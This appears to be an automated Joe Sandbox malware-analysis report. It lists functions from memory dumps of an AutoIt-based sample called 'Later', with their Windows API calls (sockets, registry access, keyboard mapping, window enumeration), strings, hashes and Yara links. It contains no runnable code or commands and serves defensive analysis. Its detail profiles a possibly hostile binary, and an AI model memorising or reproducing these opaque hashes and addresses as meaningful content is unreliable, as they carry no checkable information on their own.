std::_Lockit::~_Lockit.LIBCPMT ref: 014C3832
Concurrency::cancel_current_task.LIBCPMT ref: 014C383F

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: std::_$H_prolog3Lockit$Concurrency::cancel_current_taskFacet_Lockit::_Lockit::~_Registercodecvt
String ID:
API String ID: 3530451596-0
Opcode ID: bacdd97eed8f360b9e9aafe02e468167296723ad8c4f1afaa5c5d52713e7fd01
Instruction ID: 8c74ff6ba5d4c3799e722583ca34f2b0302da850ae3ecc8d91e35c736d4e6cf8
Opcode Fuzzy Hash: bacdd97eed8f360b9e9aafe02e468167296723ad8c4f1afaa5c5d52713e7fd01
Instruction Fuzzy Hash: B831EB75900217AFCF45EFA9D8848AFBBB9FF74624B10451EE9149B2A0DB71D901C790

Function 00C66733 Relevance: 9.1, APIs: 6, Instructions: 84COMMON

Download Yara Rule

APIs

#23.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C6678C
#111.WSOCK32(00000000), ref: 00C6679B
#2.WSOCK32(00000000,?,00000010), ref: 00C667B7
#13.WSOCK32(00000000,00000005), ref: 00C667C6
#111.WSOCK32(00000000), ref: 00C667E0
#3.WSOCK32(00000000,00000000), ref: 00C667F4

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: #111
String ID:
API String ID: 568940515-0
Opcode ID: 2b7e2162d951a8960b0451b28f29eeda9ced832a53174058d98af98ea32a3538
Instruction ID: 1516ff6c23f10138e0aafe8cb95f931363dcb40df733237061a38128e69e1ab6
Opcode Fuzzy Hash: 2b7e2162d951a8960b0451b28f29eeda9ced832a53174058d98af98ea32a3538
Instruction Fuzzy Hash: 1B21D6356006049FCB20EF64C985B7EB7E9EF44324F244558FA66A73D1CB70AD45CB91

Function 014DC3FA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,014DC3F1,014DA46C,014D978F), ref: 014DC408
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 014DC416
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 014DC42F
SetLastError.KERNEL32(00000000,014DC3F1,014DA46C,014D978F), ref: 014DC481

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 786120b45dc24d834bca913d7db644e9e57fbe0cfe8a559eeff3ef9c36923c31
Instruction ID: b8f2ead4eb359e78c66048859b7fe9e536e19bcd0ac67102587663597036dac0
Opcode Fuzzy Hash: 786120b45dc24d834bca913d7db644e9e57fbe0cfe8a559eeff3ef9c36923c31
Instruction Fuzzy Hash: 7401D83358A2266DAF352AFA7CE4B772784EB12675361033FE528591F4EE314805E784

Function 00C4C10C Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00C4C131
GetDeviceCaps.GDI32(00000000,00000058), ref: 00C4C142
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C4C149
ReleaseDC.USER32(00000000,00000000), ref: 00C4C151
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C4C168
MulDiv.KERNEL32(000009EC,?,?), ref: 00C4C17A

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: e556cf1dc285f598bc5c01b191ad51070348403e4fbaa3605f44b4d79a6c7256
Instruction ID: 903a31ae730048312bbbee634993503deaba6248a91f58336050ba835f75b2a3
Opcode Fuzzy Hash: e556cf1dc285f598bc5c01b191ad51070348403e4fbaa3605f44b4d79a6c7256
Instruction Fuzzy Hash: 24018475E40218BBEB509BA59C49B5EBFB8EF48351F104065FE04A7291D6309D10CFA0

Function 00C7C2CD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00BF16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BF1729
Part of subcall function 00BF16CF: SelectObject.GDI32(?,00000000), ref: 00BF1738
Part of subcall function 00BF16CF: BeginPath.GDI32(?), ref: 00BF174F
Part of subcall function 00BF16CF: SelectObject.GDI32(?,00000000), ref: 00BF1778

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00C7C2F7
LineTo.GDI32(00000000,00000003,?), ref: 00C7C30B
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00C7C319
LineTo.GDI32(00000000,00000000,?), ref: 00C7C329
EndPath.GDI32(00000000), ref: 00C7C339
StrokePath.GDI32(00000000), ref: 00C7C349

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 090db59096410b73df75def5b57a54991f5cd25fc063507d4feb338fa8c38a34
Instruction ID: 312cf2ec8b81e42a28298401386b0e1fa75fa72c765f6f51cfddd38519e7872f
Opcode Fuzzy Hash: 090db59096410b73df75def5b57a54991f5cd25fc063507d4feb338fa8c38a34
Instruction Fuzzy Hash: 2811F77200010DBFDB129F94DC88FAE7FADEB08364F148055BA185A1A0C7729E59EBA0

Function 00C106E6 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C10717
MapVirtualKeyW.USER32(00000010,00000000), ref: 00C1071F
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C1072A
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C10735
MapVirtualKeyW.USER32(00000011,00000000), ref: 00C1073D
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C10745

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 7c8fef8737a74a5f1c15b0b1e13be2f3eed0fd66e8a7a3d0e29ff71f14f99593
Instruction ID: 5f0bec7ec6513a1ff7f9664e147816c0bad4a3c9444986f3c3b19bc73722a9df
Opcode Fuzzy Hash: 7c8fef8737a74a5f1c15b0b1e13be2f3eed0fd66e8a7a3d0e29ff71f14f99593
Instruction Fuzzy Hash: EA016CB09017597DE3008F5A8C85B56FFB8FF59354F00411BA15C47941C7F5A868CBE5

Function 00C68A9F Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

#8.OLEAUT32(?,00C80980), ref: 00C68AC5
CharUpperBuffW.USER32(?,?), ref: 00C68BD4
#9.WSOCK32(?,00000001,00000000,Incorrect Parameter format,00000000), ref: 00C68D4C

Part of subcall function 00C5798A: #8.OLEAUT32(00000000,?,?,?,?,?,00C69B86,?,?), ref: 00C579CA
Part of subcall function 00C5798A: #10.WSOCK32(00000000,?,?,00C69B86,?,?), ref: 00C579D3
Part of subcall function 00C5798A: #9.WSOCK32(00000000,?,00C69B86,?,?), ref: 00C579DF

Strings

AUTOIT.ERROR, xrefs: 00C68BDA
Incorrect Parameter format, xrefs: 00C68AFD, 00C68CBF

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: BuffCharUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 3964851224-1221869570
Opcode ID: 083509167967fd7c4b1d67b820bf36f0999a90958442946405acf12bb0e446e2
Instruction ID: 29f328a2ee208a2d2710ffabb3efb93a8d04217b176df8f3dccc6ac5e27cfeb4
Opcode Fuzzy Hash: 083509167967fd7c4b1d67b820bf36f0999a90958442946405acf12bb0e446e2
Instruction Fuzzy Hash: 59918D756043019FC710DF24C48196BBBF4EF89714F148A6DF99A8B3A2DB31E94ACB52

Function 00C767D4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BF214F
Part of subcall function 00BF2111: GetStockObject.GDI32(00000011), ref: 00BF2163
Part of subcall function 00BF2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF216D

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C7684E
LoadLibraryW.KERNEL32(?), ref: 00C76855
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C7686A
DestroyWindow.USER32(?), ref: 00C76872

Strings

SysAnimate32, xrefs: 00C76829

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 082206afbcd5c72fdcf21ec8f2a8ad546294f3ced3d04e6cdbfd7a431f7cc40d
Instruction ID: c36b744597f0c23aee94f83842fbbff69fd971dcdd037e556f9d747c74a55e5b
Opcode Fuzzy Hash: 082206afbcd5c72fdcf21ec8f2a8ad546294f3ced3d04e6cdbfd7a431f7cc40d
Instruction Fuzzy Hash: D6217971600A06ABEF104EB4DC80FBB77ADEB59368F208628FA68921D0D731CC519761

Function 014CE54D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 014CE554
__Getcvt.LIBCPMT ref: 014CE562

Part of subcall function 014C7E36: _Maklocstr.LIBCPMT ref: 014C7E56
Part of subcall function 014C7E36: _Maklocstr.LIBCPMT ref: 014C7E73
Part of subcall function 014C7E36: _Maklocstr.LIBCPMT ref: 014C7E90
Part of subcall function 014C7E36: _Maklocchr.LIBCPMT ref: 014C7EA2
Part of subcall function 014C7E36: _Maklocchr.LIBCPMT ref: 014C7EB5

_Mpunct.LIBCPMT ref: 014CE5E1
_Mpunct.LIBCPMT ref: 014CE5FB

Strings

$+xv, xrefs: 014CE606

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: Maklocstr$MaklocchrMpunct$GetcvtH_prolog3
String ID: $+xv
API String ID: 1880433610-1686923651
Opcode ID: 941f8bf67ee6f225775fa9a54334f094f4349b810fa73d0fde77ccdec23d8b3e
Instruction ID: fb2a1265745ab0ec308f1e0ead0b6afd7bef6a1dbd7e9af26618f2c813e1a389
Opcode Fuzzy Hash: 941f8bf67ee6f225775fa9a54334f094f4349b810fa73d0fde77ccdec23d8b3e
Instruction Fuzzy Hash: 9F21B2B5904B42AFD761DF76849063BBEF8AB2C601F04091FE599C7A51E734E601CB90

Function 014DD4D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 014DD522

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: b0f88fa46ef5168f1303c5bfe9a4445e6974e6c49eeed381acb5ad7739ed7a8a
Instruction ID: 01a1c673a026b39347864dae57e4eac2f1d833701919712757ce11236bae8aca
Opcode Fuzzy Hash: b0f88fa46ef5168f1303c5bfe9a4445e6974e6c49eeed381acb5ad7739ed7a8a
Instruction Fuzzy Hash: E311B631E01225BBDF338EE89CB4A5B3B64AB05BA8F550112E916AB3E1D670ED05C6D0

Function 00C4A9E8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C01821: _memmove.LIBCMT ref: 00C0185B

Part of subcall function 00C4A835: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C4A852
Part of subcall function 00C4A835: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C4A865
Part of subcall function 00C4A835: GetCurrentThreadId.KERNEL32 ref: 00C4A86C
Part of subcall function 00C4A835: AttachThreadInput.USER32(00000000), ref: 00C4A873

GetFocus.USER32 ref: 00C4AA0D

Part of subcall function 00C4A87E: GetParent.USER32(?), ref: 00C4A88C

GetClassNameW.USER32(?,?,00000100), ref: 00C4AA56
EnumChildWindows.USER32(?,00C4AACE), ref: 00C4AA7E
__swprintf.LIBCMT ref: 00C4AA98

Strings

%s%d, xrefs: 00C4AA92

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 337cdba2c09f5bbf691de3a1f27a9d741b0aa8c9372bd1d5472e60fd18e52cdf
Instruction ID: 8f1ed138d73c8067485143a4e9a3e68661e207481ebab971f2083bc4e8428732
Opcode Fuzzy Hash: 337cdba2c09f5bbf691de3a1f27a9d741b0aa8c9372bd1d5472e60fd18e52cdf
Instruction Fuzzy Hash: A5119D71640205ABDB51BFA08D8AFAA776CFF48700F148079FE18AA182DA705945EB71

Function 014C528E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 014C5295
__Getcvt.LIBCPMT ref: 014C52A7
__Getcvt.LIBCPMT ref: 014C52C1

Strings

true, xrefs: 014C52FF
false, xrefs: 014C52EC

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: Getcvt$H_prolog3_
String ID: false$true
API String ID: 4085572910-2658103896
Opcode ID: 43fb829dafb65b3d67a05d9f631bf2077945d05efdf5558e8cc0c97f457b85a9
Instruction ID: 5598927deef12c3c98cbb2b77870f8cf802579d89b1bcd784183f5e496729ebe
Opcode Fuzzy Hash: 43fb829dafb65b3d67a05d9f631bf2077945d05efdf5558e8cc0c97f457b85a9
Instruction Fuzzy Hash: BB11D0B9940745AFC761EFB9D440B8ABBF4AF29600F04851FE1A58B661DB70E504CF50

Function 00C52153 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C52184

Strings

KEYS, xrefs: 00C5219B
APPEND, xrefs: 00C521BD
EXISTS, xrefs: 00C521AC
REMOVE, xrefs: 00C5218A

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 8796a05ce19ab2695a79c537124fc8572bb389d51a5ce3fb9d4b61dfa6e4e84c
Instruction ID: dbfa8b9a11628e199d160bc0c2ff54d75071123778370eef15bb804a05a7bb6e
Opcode Fuzzy Hash: 8796a05ce19ab2695a79c537124fc8572bb389d51a5ce3fb9d4b61dfa6e4e84c
Instruction Fuzzy Hash: 28117C749001098F8F04EF64C8628FEB7B5FF67304B604168EC2697252DB725E8AEF80

Function 014E9209 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,940E2C7A,?,?,00000000,01502585,000000FF,?,014E91A3,?,?,014E9177,00000016), ref: 014E923E
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 014E9250
FreeLibrary.KERNEL32(00000000,?,00000000,01502585,000000FF,?,014E91A3,?,?,014E9177,00000016), ref: 014E9272

Strings

CorExitProcess, xrefs: 014E9248
mscoree.dll, xrefs: 014E9237

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 277f45d4753f13986f80e5f9c761def330f219506269f3c4f57d4bc4142c7694
Instruction ID: 83936579e51df3f36840dd92de8e41d71feef2f94b884b0fc5cbc91351ac5983
Opcode Fuzzy Hash: 277f45d4753f13986f80e5f9c761def330f219506269f3c4f57d4bc4142c7694
Instruction Fuzzy Hash: 7401A735904615EFDB228F94CC09BEEBBF8FB08715F010629F821A66D4DB749404CB80

Function 014B9960 Relevance: 7.6, APIs: 5, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 014B99D7
SysStringLen.OLEAUT32(?), ref: 014B99F5
SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 014B9A32
SysFreeString.OLEAUT32(-00000001), ref: 014B9ABF
_com_issue_error.COMSUPP ref: 014B9B0A

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: String$AllocByteFree_com_issue_error
String ID:
API String ID: 2311277479-0
Opcode ID: ad3aa63cdb7173596f6b4d2c7d96d5ee6759d508f81bf9e85706198115bbec55
Instruction ID: 582fecf72f52b578d85fe9004d6f959b9136f10392893d85a7548768989242d8
Opcode Fuzzy Hash: ad3aa63cdb7173596f6b4d2c7d96d5ee6759d508f81bf9e85706198115bbec55
Instruction Fuzzy Hash: 1C5153B1A006079BEF10CF69C8C4BABB7A8AF55718F14451EE615DB3A0E775D400CBA0

Function 00C7045F Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

Part of subcall function 00C71242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C701D5,?,?), ref: 00C71259

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C70525
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C70564
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C705AB
RegCloseKey.ADVAPI32(?,?), ref: 00C705D7
RegCloseKey.ADVAPI32(00000000), ref: 00C705E4

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 98cd5a09f792e69feb9e648047d7b04723e9cdeb466a45ab49ffe1180f4eddd0
Instruction ID: 5a92e189b887c55da5908e2e547aeca1f69b631b233ee52a82162a00c3791dae
Opcode Fuzzy Hash: 98cd5a09f792e69feb9e648047d7b04723e9cdeb466a45ab49ffe1180f4eddd0
Instruction Fuzzy Hash: 24511871208204AFD754EF64C891F6AB7E8FF84304F54891DF99A87292DB31EA08DB56

Function 00C66BF7 Relevance: 7.6, APIs: 5, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 00C6823D: #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C68268

#23.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C66C4E
#111.WSOCK32(00000000), ref: 00C66C77
#2.WSOCK32(00000000,?,00000010), ref: 00C66CB0
#111.WSOCK32(00000000), ref: 00C66CBD
#3.WSOCK32(00000000,00000000), ref: 00C66CD1

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: #111
String ID:
API String ID: 568940515-0
Opcode ID: 78db2a8bdf2802d46276685913a346beb95a2727b17e91304e3db06ce2850be1
Instruction ID: 2ae61b0f3e960d564a6ca1aeafd8613aedc87ec2ea4c9ee9e81a86b5eaf4ef0a
Opcode Fuzzy Hash: 78db2a8bdf2802d46276685913a346beb95a2727b17e91304e3db06ce2850be1
Instruction Fuzzy Hash: 3A41B375600614AFDB20AF649886F7F77E8DF44710F048598FA55AB3D2CB709D048BA1

Function 00C5EA21 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C5EACF
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00C5EAF8
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C5EB37

Part of subcall function 00BF4D37: __itow.LIBCMT ref: 00BF4D62
Part of subcall function 00BF4D37: __swprintf.LIBCMT ref: 00BF4DAC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C5EB5C
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C5EB64

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
